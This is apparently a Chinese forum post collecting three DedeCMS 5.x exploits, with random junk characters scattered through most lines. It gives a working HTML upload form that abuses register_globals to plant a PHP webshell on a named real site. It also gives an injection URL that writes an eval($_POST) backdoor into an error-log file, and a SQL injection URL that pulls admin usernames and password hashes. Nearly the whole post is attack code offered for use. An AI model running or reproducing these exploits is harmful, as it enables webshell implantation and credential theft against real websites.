: ^# F0 o8 E. l1 u; X织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
; x% d% N/ d/ O0 P f9 f<html>1 b& a0 j! C' W. B
<head>
- O8 |8 ^ v6 f1 Q+ k<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
. o3 `9 Q2 j# u6 Z4 [</head>8 W, ^6 x' e0 o( Z2 \9 i
<body style="FONT-SIZE: 9pt">
, m/ v! W& i$ O4 V% |---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
K7 J, ~: {( i4 z: R<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>/ D. [) ^/ O" G& ?0 s
<input type='hidden' name='activepath' value='/data/cache/' />
8 f$ V: J: D; T<input type='hidden' name='cfg_basedir' value='../../' />
0 J) |" w9 S1 k& B, ~<input type='hidden' name='cfg_imgtype' value='php' />
% f' I$ |2 a) i/ A* q# C ~1 W<input type='hidden' name='cfg_not_allowall' value='txt' /> B7 ], W, i; ~
<input type='hidden' name='cfg_softtype' value='php' />1 y9 `, m- ?. a/ V R g) V
<input type='hidden' name='cfg_mediatype' value='php' />% E% C+ t# @$ x: w4 u {3 c/ }5 u" p1 r
<input type='hidden' name='f' value='form1.enclosure' />
! S# r$ I* L+ Q/ ?- s<input type='hidden' name='job' value='upload' />$ r C4 o' A0 n1 s
<input type='hidden' name='newname' value='fly.php' />6 Y! ~0 \' [1 h% T2 C
Select U Shell <input type='file' name='uploadfile' size='25' />
3 e3 |# E% z& R4 c3 t<input type='submit' name='sb1' value='确定' />
/ A9 x0 ^, {# `6 c4 y0 |6 L/ {</form>
. H0 ^$ Q f+ M+ M4 ?4 j<br />It's just a exp for the bug of Dedecms V55...<br />5 |! e7 u( P: k2 @8 j
Need register_globals = on...<br />
: o* ^, E& M% A' A W+ G3 GFun the game,get a webshell at /data/cache/fly.php...<br />3 N& W/ h- J8 O% `; J
</body>6 F: }! t+ X( r+ H. ~1 Y
</html>
. i/ k$ V# l* _) T- h! a
5 a* d$ w! ~3 x: j# Q
+ q1 X. M' Q, G8 E4 |) G" z. ]
8 e1 ]% A* q6 n$ u' q# R; d' w- ?4 p D6 {$ V8 H
) f0 X5 {' m |# {# ~9 m1 y
& I: l& x: K; P2 g7 C
( M0 ~$ N- G+ Y y
7 a. r. |% y- c% ?
& R4 m& V' Z" X$ ?8 F
# [* n6 r: v* W( X. F4 ]3 ?1 T织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
" [' O8 M; K1 z8 R# |利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
B! d* H E: Q% S; W* w2 E1. 访问网址:0 X U- h$ m9 ]. F' o* ?9 g! `
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
/ L1 U8 ?/ O( w ~" Y$ I" D可看见错误信息
. ^( C6 D R3 |/ p8 X( S0 c% y0 F, a5 |9 n# [
7 L' f- H- Z* k/ b* }- y
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。8 J0 I* J8 x; w' t
int(3) Error: Illegal double '1024e1024' value found during parsing) s; [8 V. }3 ^5 A; N; L3 n) i
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
% N2 h9 \/ _- `1 z+ Y/ ]
/ l1 v K# `* m8 n: W! l) q5 z. Q8 A1 w0 C
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是& P9 f3 ~5 g3 D4 H' A
: F0 ]5 u; O5 D, Y' ?
5 P; }7 `/ m7 B<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>) g: ?1 m" ^! D5 n- B" _5 L4 K
8 T9 V5 @ n+ o$ W! z& y( P5 p. z" `6 P# w9 D' L
按确定后的看到第2步骤的信息表示文件木马上传成功.
7 g% }* {, A! p$ n' g* w( }( X) Y/ G1 z5 T( W/ g7 `
4 I$ z! C! m/ p5 X( }& I2 O3 a8 e- b' a( t) z" i; v; T
7 D' \/ H. L, o; @+ B
7 u' q* s- S( U, `8 @# Z: _8 _" V# M1 R3 k' U
3 X7 Q& P. e' O( ^7 i! z0 V" o% K6 p1 B6 H7 g2 @- F
+ |% f+ P5 w' I% f5 j4 I2 O
: S# N, f) I% X% L' j7 ^9 U6 H
h+ J2 V4 P6 y: M7 M* A4 n
, b# c4 @4 v3 p织梦(DedeCms)plus/infosearch.php 文件注入漏洞
/ t; C: B6 J# c+ t* d jhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对